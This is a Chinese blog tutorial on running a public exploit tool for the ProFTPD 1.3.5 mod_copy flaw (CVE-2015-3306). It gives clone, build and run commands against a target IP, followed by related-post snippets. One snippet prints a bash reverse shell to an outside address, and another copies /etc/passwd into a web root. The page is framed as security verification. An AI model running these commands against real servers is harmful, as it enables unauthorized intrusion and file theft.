开源项目 exploit-CVE-2015-3306 使用教程

于 2024-08-20 09:51:01 发布
阅读量348 收藏 10
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/gitblog_00014/article/details/141348269
版权

开源项目 exploit-CVE-2015-3306 使用教程

exploit-CVE-2015-3306ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container项目地址:https://gitcode.com/gh_mirrors/ex/exploit-CVE-2015-3306

项目介绍

exploit-CVE-2015-3306 是一个针对 CVE-2015-3306 漏洞的开源利用工具。该漏洞影响 ProFTPD 1.3.5 版本,允许攻击者通过恶意请求执行任意代码。该项目提供了一个简单的方式来验证和利用此漏洞。

项目快速启动

环境准备

确保你有一个运行 ProFTPD 1.3.5 的服务器,并且该服务器存在 CVE-2015-3306 漏洞。

下载项目

git clone https://github.com/t0kx/exploit-CVE-2015-3306.git
cd exploit-CVE-2015-3306

编译和运行

make
./exploit -t <目标IP> -p <目标端口>

例如,如果你的目标 IP 是 192.168.1.100,端口是 21,则运行:

./exploit -t 192.168.1.100 -p 21

应用案例和最佳实践

应用案例

假设你是一名安全研究人员,需要验证某个 ProFTPD 1.3.5 服务器的漏洞情况。你可以使用此工具进行快速验证,确保服务器存在漏洞。

最佳实践

  1. 安全环境测试:始终在隔离的安全环境中测试漏洞利用工具,避免对生产环境造成影响。
  2. 及时更新:确保你的 ProFTPD 服务器已更新到最新版本,避免已知漏洞的威胁。
  3. 代码审计:定期对服务器进行代码审计,发现并修复潜在的安全漏洞。

典型生态项目

相关工具

  • Metasploit Framework:一个广泛使用的渗透测试框架,包含多个针对 ProFTPD 漏洞的模块。
  • Nmap:一个网络扫描工具,可以用于发现和验证 ProFTPD 服务器的漏洞。

相关资源

  • ProFTPD 官方网站:提供 ProFTPD 的最新版本和安全公告。
  • CVE Details:提供 CVE-2015-3306 漏洞的详细信息和影响范围。

通过以上内容,你可以快速了解并使用 exploit-CVE-2015-3306 项目,同时了解相关的应用案例和最佳实践。

exploit-CVE-2015-3306ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container项目地址:https://gitcode.com/gh_mirrors/ex/exploit-CVE-2015-3306

蓬玮剑
关注
log4j2漏洞原理分析及复现-CVE-2021-44228 (vulfocus靶场)
yang1234567898的博客
04-18 3227
搭建靶场: docker pull vulfocus/log4j2-rce-2021-12-09 //拉取靶场镜像 docker run -tid -p 38080:8080 vulfocus/log4j2-rce-2021-12-09 //运行靶场镜像 搭建成功! 利用漏洞 已经漏洞存在的情况下,构造攻击payload执行命令反弹shell bash -i >& /dev/tcp/192.168.96.166/1234 0>&1 由于...
cpx_proftpd:漏洞利用工具 CVE-2015-3306
06-11
cpx_proftpd Daniel Aldana 针对漏洞利用的 PoC。 Vadim Melihow 报告的错误。 ###方法1: 用法: python cpx_proftp.py <IP> <REMOTE> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /etc/passwd /var/www/pass.txt 然后尝试: http://127.0.0.1/pass.txt ###方法2: 用法: python cpx_proftp.py <IP> <REMOTE> 前任: python cpx_proftp.py 127.0.0.1 /var/www/html 然后尝试: http:
cve-2015-3306-proftpd-vulfocus
最新发布
c0529的博客
06-23 568
proftp是用于搭建基于ftp协议的应用软件ProFTPD是ProFTPD团队的一套开源的FTP服务器软件。该软件具有可配置性强、安全、稳定等特点。ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。
cve-2015-3306复现
Yale的博客
04-02 3396
Cve-2015-3306 背景: ProFTPD 1.3.5中的mod_copy模块允许远程攻击者通过站点cpfr和site cpto命令读取和写入任意文件。 任何未经身份验证的客户端都可以利用这些命令将文件从文件系统的任何部分复制到选定的目标。 复制命令使用ProFTPD服务的权限执行,默认情况下,该服务在“nobody”用户的权限下运行。 通过使用/ proc / self / cmdlin...
propane:利用 proftpd 中的任意文件写入错误 (CVE-2015-3306) 尝试执行代码
07-22
丙烷 利用 ProFTPD 的 mod_copy 模块 (CVE-2015-3306) 中的任意文件写入错误并尝试执行代码。
exploit-CVE-2020-28926
03-04
标题“exploit-CVE-2020-28926”暗示了这是一个关于利用特定漏洞的程序或脚本,具体来说是针对CVE-2020-28926的安全漏洞。CVE(Common Vulnerabilities and Exposures)是国际上广泛使用的一种公开安全漏洞和暴露的...
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
"laravel-CVE-2021-3129-EXP-main.zip" 包含了利用此漏洞的 EXP(exploit,即利用程序)。攻击者可能会使用以下步骤来利用此漏洞: 1. 构造带有恶意文件名的 HTTP 请求,文件名可能包含类似于 `../` 或 `%00` 这样...
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
JBoss Application Server是一款广泛使用的开源应用服务器,由Red Hat公司维护。在2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行...
内网渗透命令浅谈
weixin_38116292的博客
05-11 538
即使命令也是区分大小写的(windows不区分,linux区分) windows和linux基本命令的对比 cd 打开目录 mkdir 创建目录 rmdir 删除目录 dir和ls,列文件 move和mv 移动文件 del和rm 删除文件 copy和cp 拷贝文件 type和cat 查看文件 echo 打印字符串 echo %cd% 和pwd 打印当前工作目录 findstr和grep 查找字符串 ===== kali也可以使用powershell 直接使...
ProFTPD 截至1.3.5b 任意文件复制 CVE-2019-12815
-
01-12 257
截至1.3.5b的ProFTPD中mod_copy中存在任意文件复制漏洞
Metasploitable3渗透测试实战
温柔小薛的博客
02-17 4521
这是一个著名的靶场Metasploitable3,关于靶机搭建网上文章非常多,这里我就不再写了,但是关于漏洞挖掘没有什么文章,而且这个靶场windows版本和linux版本还有差别,我这里写一些简单的吧,自己就挖到这个程度了,有不对的地方还请前辈高人指点一二 目录1综述2.渗透过程2.1渗透路径说明2.1.1全端口扫描/服务发现2.1.2目录扫描2.1.3一、ProFTPD 1.3.5命令读取和写入任意文件。2.1.4二、sql注入2.1.5三、phpmyadmin远程php代码执行2.1.6四、文件上传漏
应用协议漏洞,2024年最新百度、华为、京东、B站最新面试题汇集
04-16 352
【代码】应用协议漏洞,2024年最新百度、华为、京东、B站最新面试题汇集。
CVE-2015-7547漏洞分析从原因到利用到补丁(非常适合小白)
u012406115的博客
05-15 9612
一、         漏洞概述 CVE漏洞链接:http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7547 披露/发现时间:2015-07-13    提交时间:2016-02-17 漏洞等级:高  漏洞类别 缓冲区溢出 漏洞概述:该漏洞是Glibc中的DNS解析器中存在基于栈的缓冲区溢出漏洞,glibc是GNU发布的li
HTTP.sys 远程执行代码漏洞(CVE-2015-1635)(MS15-034)简单测试
热门推荐
rigous的博客
03-08 1万+
        无意中用扫描器扫到了HTTP.sys 漏洞,因为之前写过python单poc脚本,感觉exp应该也是存在的。本着常识的心态找一下利用代码,如果能提权是再好不过的。    根据网上的记录,此漏洞利用最多的是导致蓝屏。RCE还无法找到,可能被大牛私藏了。由于会导致BSOD,所以只能在本地进行测试了。步骤如下:    1、环境搭建,由于本人的server只有2003,只能安装iis6.0...
Mysql本地提权及远程代码执行漏洞浅析(CVE-2016-6662)
9ian1i
10-17 4796
0x00 漏洞影响mysql 5.5、5.6、5.7 在10月份更新前的所有版本,包括分支版本MariaDB和PerconaDB 。0x01 利用途径通过远程数据库连接,web接口如phpMyAdmin,以及sql注入都可以完成。0x02 漏洞原理一些默认的mysql安装方式并且mysqld_safe脚本作为包装器以root权限启动mysql服务进程,比如像:service mysql start
CVE-2015-1805漏洞解析及验证
Tomes.V.White
05-17 2012
转载自:https://www.anquanke.com/post/id/836820x0  漏洞信息影响所有Nexus手机和部分Android手机的漏洞,Google于2016/03/18发布了公告修复,具体请看链接.http://www.cvedetails.com/cve-details.php?t=1&amp;cve_id=cve-2015-1805Xhttp://source.andro...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

蓬玮剑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值